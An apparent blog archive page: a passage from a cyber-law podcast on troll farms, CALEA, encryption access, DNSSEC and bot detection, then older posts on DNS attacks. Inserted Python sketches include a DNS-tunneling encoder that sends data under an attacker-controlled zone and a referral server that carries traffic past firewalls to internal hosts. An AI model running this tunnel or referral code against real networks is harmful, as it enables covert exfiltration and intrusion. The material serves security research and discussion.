Stewart: Maybe; so that’s right. On the other hand the Anthem data never showed up in the markets. We have better intelligence than we used to. We’ll know if this stuff gets sold and it hasn’t been sold because – I don’t want to give the Chinese ideas but –

Dan: I don’t think they need you to give them ideas; sorry.

Stewart: One more story just to show that I was well ahead of the Chinese on this – my first security clearance they asked me for people with whom I had obligations of affection or loyalty, who were foreigners. And I said I’m an international lawyer – this was before you could just print out your Outlook contacts – I Xeroxed all those sheets of business cards that I’d collected, and I sent it to the guys and said, “These are all the clients or people I’ve pitched,” and he said, “There are like 1,000 names here.” I said, “Yeah, these are people that I either work for or want to work for.” And he said, “But I just want people to whom you have ties of obligation or loyalty or affection.” I said, “Well, they’re all clients and I like them and I have obligations to clients or I want them to be. I’ve pitched them.” And he finally stopped me and said, “No, no, I mean are you sleeping with any of them?” So good luck China, figuring out which of them, if any, I was actually sleeping with.

Dan: You see, you gave up all those names to China.

Stewart: They’re all given up.

Dan: Look what you did!

Stewart: Exactly; exactly. Okay, last topic – Putin’s trolls – I thought this was fascinating. This is where the New York Times really distinguished itself with this article, because it told us something we didn’t know and shed light on something kind of astonishing. This is the Internet Research Agency, I think. They have an army of trolls – and the Chinese have an even larger army of trolls – and essentially Putin’s FSB has figured out that if you don’t want to have a Facebook revolution or a Twitter revolution, you need to have people on Twitter and Facebook 24 hours a day, posting comments and turning what would otherwise be evidence of dissent into a toxic waste dump, with people trashing each other, going off in weird directions, and saying stupid things to the point where no one wants to read the comments anymore.

It’s now a policy. They’ve got a whole bunch of people doing it, and on top of it they’ve decided, “Hell, if the US is going to export Twitter and Twitter revolutions then we’ll export trolling,” and to the point where they’ve started making up chemical spills and tweeting them with realistic video and people weighing in to say, “Oh yeah, I can see it from my house, look at those flames.” All completely made up and doing it as though it were happening in Louisiana.

Dan: The reality is that for a long time the culture was managed. We had broadcasts, broadcasters had direct government links, everything was filtered, and the big experiment of the internet was: what if we just remove those filters? What if we just let people manage it themselves? And astroturfing did not start with Russia; there’s been astroturfing for years. It’s where you have these people making fake events and controlling the message. What is changing is the scale of it. What is changing is who is doing it. What is changing is the organization and the amount of investment. You have people who are professionally operating to reduce the credibility of Twitter and of Facebook so that, quote/unquote, the only thing you can trust is the broadcast.

Stewart: I think that’s exactly right. I think they call the Chinese version of this the 50 Cent Army, because they get 50 cents a post. But I guess I am surprised that the Russians would do that to us in what is plainly an effort to test whether they could totally disrupt our emergency response. It didn’t do much in Louisiana, but it wouldn’t be hard, in a more serious crisis, for them to create panic, doubt and uncertainty about the reliability of a whole bunch of media in the United States.

This was clearly a dry run and our response to it was pretty much that. I would have thought that the US government would say, “No, you don’t create fake emergencies inside the United States by pretending to be US news media.”

Jason: I was going to say all those alien sightings in Roswell in the last 50 years do you think were Russia or China?

Stewart: Well, they were pre-Twitter; I’m guessing not, but from now on I think we can assume they are.

Dan: What it all comes back to is the crisis of legitimacy. People do not trust the institutions around them. If you look, there’s too much manipulation, too much spin, too many lies, and as it happens institutions are not all bad. You know what? Vaccines are awesome. But because of this lack of legitimacy, people go looking for the thing they’re supposed to be paying attention to instead, because the normal stuff keeps turning out to be a lie. And really, what Russia’s doing here is saying, “We’re going to find the things that you’re turning to instead, the things you think aren’t lying, and we’re going to lie there too, because what we really want is for America to stop airing our dirty laundry through this Twitter thing, and if America is not going to regulate Twitter we’re just going to go ahead and make a mess of it too.”

Stewart: Yeah. I think their view is, “Well, Twitter undermines our legitimacy; we can use it to undermine yours.”

Dan: Yeah, Russians screwing with Americans; more likely than you think.

Michael: I’m surprised you guys see it as an effort to undermine Twitter; this strikes me as classic KGB disinformation tactics, and it seems to me they’re using a new medium and, as you said before, doing dry runs, so that when they actually have a need to engage in information operations against the US or against Ukraine or against some other country, they’ll know how to do it. They’ll have practiced corps of trolls who know how to do this stuff in today’s media. I don’t think they’re trying to undermine Twitter.

Stewart: One of the things that’s interesting is that the authoritarians have figured out how to manage their people using electronic tools. They were scared to death by all of this stuff ten years ago, and they’ve responded very creatively and very effectively, to the point where I think they can maintain an authoritarian regime for a long time, without totalitarianism but still very effectively. And now they’re in the process of saying, “Well, how can we use these tools as a weapon?” – the way they perceive the US to have used them as a weapon in the first ten years of social media. We need a response, because they’re not going to stop doing it until we have one.

Michael: I’d start with the violation of the missile treaty before worrying about this so much.

Stewart: Okay, so maybe this is of a piece with the Administration’s strategy for negotiating with Russia, which is to hope that the Russians will come around. The Supreme Court had a ruling in a case we talked about a while ago; this is the guy who wrote really vile, threatening and scary things about his ex-wife and the FBI agent who came to interview him, and who said afterwards, after he’d posted on Facebook and been arrested for it, “Well, come on, I was just doing what everybody in hip hop does; you shouldn’t take it seriously. I didn’t.” The Supreme Court was asked to decide whether the test for a threat is the understanding of the writer or the understanding of the reader – at least that’s how I read it – and they sided with the writer, with the guy who wrote all those vile things. Michael, did you look more closely at that than I did?

Michael: The court read into it a requirement that the government has to show at least that the defendant sent the communication with the purpose of issuing a threat or with the knowledge that it would be viewed as a threat, and it wasn’t enough for the government to argue and a jury to find that a reasonable person would perceive it as a threat.

So you have to show at least knowledge or purpose or intent, and it left open the question whether recklessness as to how it would be perceived, was enough.

Stewart: All right; well, I’m not sure I’m completely persuaded but it probably also doesn’t have enough to do with CyberLaw in the end to pursue. Let’s close up with one last topic, which is the FBI is asking for or talking about expanding CALEA to cover social media, to cover communications that go out through direct messaging and the like, saying it’s not that we haven’t gotten cooperation from social media when we wanted it or a wiretap; it’s just that in many cases they haven’t been able to do it quickly enough and we need to set some rules in advance for their ability to do wiretaps.

This is different from the claim that they’re Going Dark and that they need access to encrypted communications; it really is an effort to change CALEA – the Communications Assistance for Law Enforcement Act of 1994, which imposed that obligation on cellphone companies and then later on voice-over-IP providers. Jason, what are the prospects for this? How serious a push is this?


Jason: Well, the prospects are that it’s DOA, but just to put it in a little historical perspective: Going Dark has of late been the name for the FBI’s effort to deal with encryption, but the original use of that term, at least in 2008/2009 when the FBI started a legislative push to amend CALEA and extend it to internet-based communications, was for that effort. They would routinely cite the fact that there was a very significant number of wiretaps, in both criminal and national security cases, that providers not covered by CALEA didn’t have the technical capability to implement.

So it wasn’t about law enforcement having the authority to conduct a wiretap; by definition they had already developed enough evidence to satisfy a court that they could meet the legal standard. It was about the provider’s ability to help them execute the authority they already had. As you suggested, either the wiretap couldn’t be done at all, or the provider and the government would have to work together to develop a technical solution, which could take months and months, by which time the target wasn’t using that method of communication anymore; he had moved on to something else.

So for the better part of four years – my last four years at the department – the FBI, along with DEA and some other agencies, was pushing for a massive CALEA reform effort to expand it to internet-based communications. At that time – this is pre-Snowden; it’s certainly truer now – it was viewed as a political non-starter to try to convince providers that CALEA should be expanded.

So they downshifted, as a Plan B, to trying to amend Title 18 – and I think there were some parallel amendments to Title 50 – but the Title 18 amendments would have dramatically increased the penalties for a provider who didn’t have the capability to implement a valid wiretap order that law enforcement served.

There would be this graduated series of penalties that would essentially create a significant financial disincentive for a provider not to have an intercept capability in place in advance, or not to be able to develop one quite quickly. So the FBI, although it wanted CALEA to be expanded, was willing to settle for this sort of indirect way of achieving the same thing: incentivizing providers to develop intercept solutions.

That was an unlikely bill to make it to the Hill, let alone through the Hill, before Snowden; after Snowden I think it became political plutonium. It was very hard even before Snowden to explain to people that this was not an effort to expand authorities; it was about executing those authorities. That argument became almost impossible to make in the post-Snowden world.

What struck me about this story, though, is that they appear to be going back to Plan A, which is trying to go in the front door and expand CALEA, and the only way I can interpret that is that either the people running this effort now are unaware of the previous history, or they’ve just decided, what the hell, they have nothing to lose. They’re unlikely to get it through anyway, so they might as well ask for what they want.

Stewart: That’s my impression. There isn’t any likelihood in the next two years that encryption is going to get regulated, but the Justice Department and the FBI are raising this issue, I think, partly on a what-the-hell basis – this is what we want, this is what we need, we might as well say so – and partly, I think, as preparation of the battle space for the time when they actually have a really serious crime that everybody wishes had been solved and that can’t be solved because of some of these technical gaps.

Dan: You know what drives me nuts? We’re getting hacked left and right, we’re leaking data left and right, and all these guys can talk about is how they want to leak more data. Like, when we finish here, this is about encryption: we’re not saying we’re banning encryption, but if there’s encryption and we can’t get through it, we’re going to have a graduated series of costs, or we’re going to pull CALEA into this. There are entire classes of software we need to protect American business that are very difficult to invest in right now. It’s very difficult to know, in the long term, that you’re going to get to run it.

Stewart: Well, actually my impression is that VCs are falling all over themselves to fund people who say, “Yeah, we’re going to stick it to the NSA.”

Dan: Yeah, but those of us who actually know what we’re doing know that whatever would actually work is under threat. There are lots of scammers out there; oh my goodness, there is some great, amazing, 1990s-era snake oil going on, but the smart money is not too sure we’re going to get away with securing anything.

Stewart: I think that’s probably right; why don’t we just move right in, because I had promised I was going to carry this question over from the news roundup. Julian Sanchez raised it; I raised it with Julian on a previous podcast. We were talking about the effort to get access to encrypted communications, and I mocked the people who said, “Oh, you can never provide access like that; that’s always a bad idea.” And I said, “No, come on.” Yes, it creates a security risk and you have to manage it, but sometimes the security risk and the cost of managing it are worth it because of the social values at stake.

Dan: Sometimes you lose 30 years of background check data.

Stewart: Yeah, although I’m not sure they would have. I’m not sure how encryption, especially encryption of data in motion, would have changed that.

Dan: It’s a question of can you protect the big magic key that gives you access to everything on the Internet, and the answer is no.

Stewart: So let me point to the topic that Julian didn’t want to get into because it seemed to be more technical than he was comfortable with which is –

Dan: Bring it on.

Stewart: Exactly. I said, “Are you kidding me? End-to-end encryption?” The only end-to-end encryption that has been adopted universally on the internet since encryption became widely exportable is SSL/TLS. That’s everywhere; it’s the default.

Okay, but SSL/TLS is broken every single day by the thousands, if not the millions, and it’s broken by respectable companies. In fact, probably every Fortune 500 company insists that SSL has to be broken at their firewall.

And they do it; they do it so that they can inspect the traffic to see whether some hacker is exfiltrating the –

Dan: Yeah, but they’re inspecting their own traffic. Organizations can go ahead and balance their benefits and balance their risks. When it’s an external actor it’s someone else’s risk. It’s all about externality.

Stewart: Well, yes, okay; I grant you that. The point is that the idea that building in access is always a stupid idea, never worth it, is just wrong – or at least it’s inconsistent with the security practices we have today. And probably, if anything, some of the things that companies like Google and Facebook are doing to promote SSL are going to result in more exfiltration of data. People are already exfiltrating data through Google properties, because Google insists that they be whitelisted from these intercepts.

Dan: What’s increasingly happening is that corporations are moving the intercept, DLP (data loss prevention) and analytics roles to the endpoint, because operating them at a midpoint just gets slower and more fragile day after day, month after month, year after year. If you want security, look, it’s your property; you’re a large company, you own 30,000 desktops, they’re your desktops, and you can put stuff on them.

Stewart: But on the problem the companies have – weighing the importance of end-to-end encryption for security against the importance of being able to monitor activity for security – they have come down and said, “We have to be able to monitor it; we can’t just assume that every one of our users is operating safely.” That’s a judgment society can make just as easily. Once you’ve had the debate, society can say, “On the whole, weighing the privacy of everybody in our country against the risks of criminals misusing that data, we’re prepared to take some risk on the security side – to have less effective end-to-end encryption – in order to make sure that people cannot get away with breaking the law with impunity.”

Dan: Here’s a thing though – society has straight out said, “We don’t want bulk surveillance.” If you want to go ahead and monitor individuals, you have a reason to monitor, that’s one thing but –

Stewart: But you can’t monitor all of them if they’ve been given end-to-end encryption. I agree with you – there’s a debate; I’m happy to continue debating it, but I’ve lost so far. But say, no, it’s this guy; this guy, we want to listen to his communications, we want to see what he is saying on that encrypted tunnel – you can’t break that just by stepping into the middle of it unless you already own his machine.

Dan: Yeah, and it’s unfortunately the expensive road.

Stewart: because they don’t do no good.

Dan: isn’t there. It isn’t the actual thing.

Stewart: It isn’t here – I’m over at Stanford and we’re at the epicenter of contempt for government, but everybody gets a vote. You get a vote if you live in Akron, Ohio too, but nobody in Akron gets a vote about whether their end-to-end encryption is going to be deployed.

Dan: You know, look, average people, normal people have like eight secure messengers on their phone. Text messaging has fallen off a cliff; why? At the end of the day it’s because people want to be able to talk to each other and not have everyone spying on them. There’s a cost, there’s an actual cost to spying on the wrong people.

Stewart: There is?

Dan: If you go ahead and you make everyone your enemy you find yourself with very few friends. That’s how the world actually works.

Stewart: All right; I think we’ve at least agreed that there’s routine breakage of the one end-to-end encryption methodology that has been widely deployed. I agree with you, people are moving away from man-in-the-middle and are looking for ways to break into systems at or close to the endpoint. Okay; let’s talk a little bit, if we can, about DNSSEC, because we had a great fight over SOPA and DNSSEC, and I guess the question for me is – well, maybe you can give us two seconds or two minutes on what DNSSEC is and how it’s doing in terms of deployment.

Dan: DNSSEC, at the end of the day makes it as easy to get encryption keys as it is to get the address for a server. Crypto should not be drama. You’re a developer, you need to figure out how to encrypt something, hit the encrypt button, you move on with your life. You write your app. That’s how it needs to work.

DNS has been a fantastic success at providing addressing for the internet. It would be nice if keying were just as easy, but let me tell you, how do you go out and talk to all these internet people about how great DNSSEC is when really it’s very clear DNS itself is contested – it’s not like the SOPA fights, that’s not going to come back –

Stewart: Yeah; well, maybe.

Dan: – and then there’s the security establishment, which should be trying to make America safer, saying, “Man, we really want to make sure we get our keys in there.” When that happens [it doesn’t work]. It’s not that DNSSEC isn’t a great technology, but it really depends on [the DNS and its contents] being politically sacrosanct.

Stewart: Obviously DHS and OMB committed to getting DNSSEC deployed at the federal level, so their enthusiasm for DNSSEC has been substantial. Are you saying that they have undermined that in some way that –

Dan: The federal government is not monolithic; two million employees, maybe more, and what I’m telling you is that the security establishment keeps saying, “Hey, we’ve got to be able to get our keys in there too,” and so we’ve got this dual-mission problem going on here. With any system that has a dual mission, no one actually believes the dual mission, okay.

If the Department of Transportation were like, “Maybe cars should crash from time to time,” or if Health and Human Services were like, “Hey, you know, polio is kind of cool for killing some bad guys,” no one would take those vaccines, because maybe it’s the other mission, and that’s kind of the situation that we have right here. Yeah, DNSSEC is a fantastic technology for key distribution, but we have no idea what you’re going to do with it five years from now, and so instead it’s being replaced with garbage [EDIT: This is rude, and inappropriate verbiage.]

I’m sorry, I know people are doing some very good work, but let me tell you, their value add is a bunch of centralized systems that all say, “But we’re going to stand up to the government.” I mean, that’s the value add, and it never scales, it never works, but we keep trying because we’ve got to do something, because it’s a disaster out there. And honestly, anything is better than what we’ve got, but what we should be doing is DNSSEC, and as long as you keep making this noise we can’t do it.

Stewart: So DNSSEC is up to what? Ten percent deployment?

Dan: DNSSEC needs a round of investment that makes it a turnkey switch.

Stewart: Aah!

Dan: DNSSEC could be done [automatically] but every server just doesn’t. We [could] just transition the internet to it. You could do that. The technology is there but the politics are completely broken.
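[To make the “keys as easy as addresses” point above concrete, here is a minimal sketch – not Phreebird or any production tool – of pulling a DANE TLSA record (a certificate/key binding) out of DNS with the third-party dnspython library and checking whether a validating resolver vouched for it. The resolver address and the example host are assumptions, and the host must actually publish TLSA records for the lookup to return anything.]

```python
# Minimal sketch: fetch a DANE TLSA record from DNS and check the Authenticated
# Data bit set by a DNSSEC-validating resolver. Assumes dnspython >= 2.x; the
# resolver IP and the host name are placeholders.
import dns.flags
import dns.resolver

def fetch_tlsa(host: str, port: int = 443):
    resolver = dns.resolver.Resolver()
    resolver.nameservers = ["1.1.1.1"]        # a DNSSEC-validating recursive resolver
    resolver.use_edns(0, dns.flags.DO, 1232)  # ask for DNSSEC records in responses
    answer = resolver.resolve(f"_{port}._tcp.{host}", "TLSA")
    validated = bool(answer.response.flags & dns.flags.AD)  # resolver validated the chain
    return [(validated, rr.to_text()) for rr in answer]

if __name__ == "__main__":
    for validated, record in fetch_tlsa("example.com"):  # replace with a TLSA-publishing host
        print("validated" if validated else "UNVALIDATED", record)
```

[Trusting a remote resolver’s AD bit is only meaningful over a trusted path; a real client would validate locally, but the point is how little ceremony the key lookup itself requires.]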

Stewart: Okay; last set of questions. You’re the Chief Scientist at WhiteOps, so let me tell you what I think WhiteOps does, and then you can tell me what it really does. I think of WhiteOps as having made the observation that the hackers who are getting into our systems are doing it from a distance. They’re sending bots in to pack up and exfiltrate data. They’re logging on, and bots look different from human beings when they type stuff, and the people who are trying to manage an intrusion remotely also look different from somebody who is actually on the network. What WhiteOps is doing is saying, “We can find those guys and stop them.”

Dan: And that’s exactly what we’re doing. Look, I don’t care how clever your buffer overflow is; you’re not teleporting in front of a keyboard, okay? That’s not going to happen. So our observation is that we have this very strong signal. It’s not perfect, because sometimes people VPN in, and sometimes people build scripted processes.

Stewart: But they can’t keep a VPN up for very long?

Dan: [If somebody is remotely] on the machine, you can pick it up in JavaScript. So a website that’s being accessed lilypad-style – either through bulk communications between a bot and its command and control, or through interactive remote control – churns out weak signals that we’re able to pick up in JavaScript.

Stewart: So this sounds so sensible and so obvious that I guess my question is: how come it took this long for that observation to become a company?

Dan: I don’t know, but we built it. The reality is that it requires knowledge of a lot of really interesting browser internals. At WhiteOps we’ve been breaking browsers for years, so we’re basically taking all these bugs that never actually let you attack the user but that respond completely differently inside a bot environment. That’s kind of the secret sauce.

Every browser really has a core that handles HTML5, JavaScript, video – all the things you’ve got to do to be a web browser. Then there’s this goop around it, right? It puts things on the screen, it has a back button, an address bar, it lets you configure stuff. It turns out that the bots use the core, not the goop.

Stewart: Oh yeah, because the core enables them to write one script for everything?

Dan: Yeah, so you have to think of bots as really terribly tested browsers and once you realize that it’s like, “Oh, this is barely tested, let’s make it break.”

Stewart: Huh! I know you’ve been doing work with companies looking for intrusions. You’ve also been working with advertisers, now trying to find people who are basically engaged in click fraud. Any stories you can tell about catching people on well-guarded networks?

Dan: One story I really enjoy – we actually ran the largest study of ad fraud of its kind that had ever been done. We found that there’s going to be about $6 billion of ad fraud; the study is at http://whiteops.com/botfraud. And we had this one case – we told the world we were going to go ahead and run this test in August and find all the fraud. You know what? We lied. We do that sometimes.

We actually ran the test from a little bit in July all the way through September, and we watched this one campaign: 40 percent fraud; then, when we said we were going to start, three percent fraud; then, when we said we had stopped, back to 40. You just had this square wave. It was the most beautiful demo. We showed this to the customer – one of the biggest brands in the country – and they were just like, “Those guys did what?”

And here’s what’s great – for my entire career I’ve been dealing with how people break in. This bug, that bug, what’s wrong with Flash, what’s wrong with Java. This is the first time in my life I have ever been dealing with why: people are doing this fraud to make money, so let’s stop the checks from being written. It’s been incredibly entertaining.

Stewart: Oh, that it is; that’s very cool. And I guess maybe this is the observation: we wasted so much time hopelessly trying to keep people out of systems; now everybody says, “Oh, you have to assume they’re in,” but that doesn’t mean you have the tools to really deal with them, and this is a tool to deal with people once they’re in.

Dan: There’s been a major shift from prevention to detection. We basically say, “Look, okay, they’re going to get in but they don’t necessarily know what perfectly to do once they’re in.” Their actions are fundamentally different than your legitimate users and they’re always going to be because they’re trying to do different things; so if you can detect properties of the different things that they’re doing you actually have signals, and it always comes down to signals in intelligence.

Stewart: Yeah; that’s right. I’m looking forward to NSA deploying WhiteOps technology, but I won’t ask you to respond to that one. Okay, Dan, this was terrific I have to say. I’d rather be on your side of an argument than against you, but it’s been a real pleasure arguing this out. Thanks for coming in Michael, Jason; I appreciate it.

Just to close up: the CyberLaw Podcast is open to feedback. Send comments to cyberlawpodcast@steptoe.com or leave a message at 202 862 5785. I’m still waiting for an entertainingly abusive voicemail; we haven’t gotten one yet. This has been episode 70 of the Steptoe CyberLaw Podcast, brought to you by Steptoe & Johnson. Next week we’re going to be joined by Catherine Lotrionte, the Associate Director of the Institute for Law, Science and Global Security at Georgetown. And coming soon we’re going to have Jim Baker, the General Counsel of the FBI, and Rob Knake, a Senior Fellow for Cyber Policy at the Council on Foreign Relations. We hope you’ll join us next week as we once again provide insights into the latest events in technology, security, privacy and government.

Categories: Security

Summaries

August 8, 2008 4 comments

Very nice summary of the “How” part of my talk here.

I do think “Why does DNS matter this much?” is a more important question.  It’s 2008 — why can I still not email securely between companies?  It’s a little sad that such a simple and basic bug can:

1) Break past most username/password prompts on websites, no matter how the site is built.
2) Break the Certificate Authority system used by SSL, because Domain Validation sends an email and email is insecure.
3) Expose the traffic of SSL VPNs, because heh, who needs to check certificates anyway
4) Force malicious automatic updates to be accepted
5) Cause millions of lines of totally unfuzzed network code to be exposed to attack
6) Leak TCP and UDP connectivity behind the firewall, to any website, in an attack we thought we already fixed twice now
7) Expose the traffic of tools that aren’t even pretending to be secure, because “it’s behind the firewall” or “protected by a split-tunneling IPsec VPN”.

It’s just DNS cache poisoning.  Why does it get to do this much damage? 

The whole “hostile vs. safe” network myth needs to die.  Every network is hostile — the DNS bug just made true something that should already have been assumed, but wasn’t.  And we need to get faster and better at fixing the infrastructure.  Using things until the moment of catastrophic failure — be they bridges, DNS, or MD5 — is a problem, and we can do better.

FX of Phenoelit made an important point a while back — everything you can do with this DNS attack, you can do with SNMPv3.  If you haven’t patched your routers — and that includes your internal routers, since Java’s giving UDP access out and you can thus issue SNMP queries with it (not their fault, the entire web security model collapses when DNS is broken and this is just yet another break) — you should probably do that too.

It’s going to be an interesting couple of months.  We’re going to see a lot of blended/combination attacks, as attacks we thought were infeasible in the real world suddenly start proving themselves entirely viable (at least, given insecure infrastructure).  The previously unfuzzed network clients are probably going to be particularly problematic — if you write a network app that is not a web browser, now is a good time to start feeding random (or even better, semi-random) data to it and switching the autoupdater to SSL.  New attacks are already popping up, only a few days in.  Ben Laurie just came out with a harrowing and beautiful advisory against some common OpenID deployments.  I knew about the intersection of DNS and OpenID, and I knew about the intersection of DNS and Debian’s badly generated certs (a problem which, I’d like to point out, is much harder to patch due to our continuing lack of an effective certificate revocation infrastructure).  But it took Ben Laurie to attack “Secure” OpenID providers using Debian Certs via DNS.  Fantastic, excellent work.
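For anyone taking the fuzzing advice above, here is a hedged, minimal sketch of what “semi-random” can look like in practice: a throwaway server that hands your (non-browser) network client byte-flipped copies of a known-good response, so you can point the client at it and watch for crashes or hangs. The port and the canned response are placeholders, and a real effort would add crash monitoring and a corpus of seed messages.

```python
# Minimal client-fuzzing sketch: serve corrupted copies of a valid response to
# the network client under test. Placeholder port and canned message; this is
# an illustration of the idea, not a real fuzzer.
import random
import socketserver

CANNED = b"HTTP/1.0 200 OK\r\nContent-Length: 5\r\n\r\nhello"   # any known-good response

def mutate(data: bytes, flips: int = 4) -> bytes:
    buf = bytearray(data)
    for _ in range(flips):
        buf[random.randrange(len(buf))] = random.randrange(256)  # flip a few bytes
    return bytes(buf)

class FuzzHandler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.recv(4096)               # read the client's request, if it sends one first
        self.request.sendall(mutate(CANNED))  # reply with a corrupted response

if __name__ == "__main__":
    with socketserver.TCPServer(("127.0.0.1", 8081), FuzzHandler) as server:
        server.serve_forever()                # point the client under test at port 8081
```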

Categories: Security

Packet Geeks Gone WWWild

August 2, 2007 Leave a comment

OK, I was *trying* not to mess with DNS, but the combination of “DNS”, “Firewall”, and “Tunneling” proved just too tempting for me to ignore. Here’s the slides from my Black Hat talk — I’ll update after Defcon, but yeh, here’s what I’m playing with!

Black Ops 2007: Design Reviewing The Web

Everyone’s talkin’ about the TCP relaying stunts, but there’s also Audio CAPTCHA analysis and (my favorite) concrete mechanisms for busting Provider Hostility.

(What’s Provider Hostility? The opposite of Network Neutrality. Not fun.)

Categories: Security

Quick Summary: What's New?

August 1, 2004 Leave a comment

OK, let me repeat.

Throwing arbitrary data in DNS — NOT a big deal.

Even doing network tunneling over DNS — ALSO not that big a deal; NSTX has been doing this for a while. (That being said — SSH over DNS adds strong cryptography and major cross platform compatibility that didn’t exist before.)
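Since the tunneling point comes up so often, here is a hedged sketch of the basic encoding trick such tools rely on (this is not NSTX’s or any other tool’s actual wire format): outbound bytes ride as base32 labels in query names under a zone whose authoritative server you control, and the server decodes them on arrival. The zone name is a placeholder.

```python
# Minimal DNS-tunnel encoding sketch: pack payload bytes into query-name labels
# under an attacker-controlled zone, and unpack them on the authoritative side.
# Placeholder zone; not the wire format of NSTX or any other real tunnel.
import base64

ZONE = "tunnel.example.com"   # a zone whose authoritative server you control
MAX_LABEL = 63                # DNS limit on a single label

def encode_chunk(seq: int, payload: bytes) -> str:
    """Build a query name of the form <seq>.<base32 labels>.<zone>."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    return ".".join([str(seq)] + labels + [ZONE])

def decode_chunk(qname: str):
    """Recover (sequence number, payload) from a query name on the server side."""
    parts = qname.rstrip(".").split(".")
    zone_len = ZONE.count(".") + 1
    b32 = "".join(parts[1:-zone_len]).upper()
    b32 += "=" * (-len(b32) % 8)              # restore the padding stripped above
    return int(parts[0]), base64.b32decode(b32)

if __name__ == "__main__":
    name = encode_chunk(0, b"ssh handshake bytes go here")
    print(name)
    print(decode_chunk(name))
```

Keep each payload chunk small enough that the full name stays under DNS’s 255-byte limit; replies come back the same way, typically packed into TXT records.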

DNS radio is new. By segmenting audio into small chunks, we actually get universal caching of the streaming signal — a functionality we’ve never really had before. Generally, audio broadcast over the Internet falls apart after a few thousand users. Based on this ring-buffer-into-BIND architecture, combined with the utterly minimal bandwidth load of Speex, we should be able to host audio for a much greater number of listeners.
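Here is a hedged sketch of the ring-buffer idea, not the original ring-buffer-into-BIND code: number the compressed audio chunks, publish each one as a TXT record under a rolling slot name, and let every recursive resolver between you and the listeners cache the stream for its own users. The zone, chunk size and ring length are placeholders.

```python
# Minimal "DNS radio" sketch: emit BIND-style TXT records, one per audio chunk,
# keyed by a rolling slot number so the zone acts as a ring buffer. Placeholder
# zone and sizes; not the original implementation.
import base64
from typing import Iterator

ZONE = "radio.example.com"
CHUNK = 180     # bytes of already-compressed (e.g. Speex) audio per record
RING = 600      # number of slots before the ring wraps

def txt_records(stream: bytes) -> Iterator[str]:
    for offset in range(0, len(stream), CHUNK):
        slot = (offset // CHUNK) % RING                      # ring-buffer position
        data = base64.b64encode(stream[offset:offset + CHUNK]).decode()
        # Short TTLs keep the ring fresh while still letting resolvers cache it.
        yield f'{slot}.{ZONE}. 30 IN TXT "{data}"'

if __name__ == "__main__":
    fake_audio = bytes(range(256)) * 4                       # stand-in for codec output
    for record in list(txt_records(fake_audio))[:3]:
        print(record)
```

A player would simply resolve slot 0, 1, 2, … in order and feed the decoded bytes to the codec; once a few thousand listeners share a handful of recursive resolvers, most of those queries never reach the origin at all.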

The entire suite of incoming attacks against firewalls is also new. DNS trusts the hierarchy to tell it the next hop to its target name; since I can acquire second-level domains in the hierarchy for minimal cost, it’s trivial for me to insert arbitrary destinations along the DNS route path. In technical terms, whenever a recursing resolver comes to my name server to resolve a name, rather than providing an answer, I can redirect that request to another, supposedly authoritative server. That server can be at any address — even one I cannot IP route to — but if the resolver communicating with me can route to that address (say 10.0.1.11), my communication will reach that host. If there’s an SSH over DNS daemon running on 10.0.1.11, I’ve now achieved incoming connectivity to the network of my choice, completely bypassing firewalls and a trojan’s need to poll.
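A hedged sketch of that redirection, using the third-party dnslib package (this is not the original code): instead of answering, the “authoritative” server hands back a delegation whose glue record points at an address only the querying resolver’s network can reach. All names, addresses and the port are placeholders.

```python
# Minimal referral sketch: answer every query with a delegation whose glue A
# record points at an internal host (10.0.1.11 here), so the recursing resolver
# carries the conversation inside the firewall. Assumes the dnslib package.
from dnslib import A, DNSRecord, NS, QTYPE, RR
import socketserver

INSIDE_HOST = "10.0.1.11"    # internal box running, say, an SSH-over-DNS daemon

class ReferralHandler(socketserver.BaseRequestHandler):
    def handle(self):
        data, sock = self.request
        query = DNSRecord.parse(data)
        qname = str(query.q.qname)
        reply = query.reply()
        # No answer section: just "ask that server instead", plus glue for it.
        reply.add_auth(RR(qname, QTYPE.NS, ttl=60, rdata=NS("relay." + qname)))
        reply.add_ar(RR("relay." + qname, QTYPE.A, ttl=60, rdata=A(INSIDE_HOST)))
        sock.sendto(reply.pack(), self.client_address)

if __name__ == "__main__":
    with socketserver.UDPServer(("0.0.0.0", 5353), ReferralHandler) as server:
        server.serve_forever()   # delegate a test zone here to try it out
```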

Recursion on dual hosted interfaces is not even necessary. There are large numbers of applications that, upon receiving untrusted traffic, execute DNS name lookups. Most commonly, they are reverse PTR lookups, but occasionally there are other types (MX from mail servers, most notably) that can be easily induced. When they are induced, the hierarchy is followed. When the hierarchy is followed, the attacks previously discussed start working. In practice, this means an IDS triggers the DNS server to start proxying traffic between an external attacker host and an internal trojaned machine. Nasty.

There’s some other stuff — check out the slides and the code — but long story short, there’s some new stuff out 🙂

Categories: Security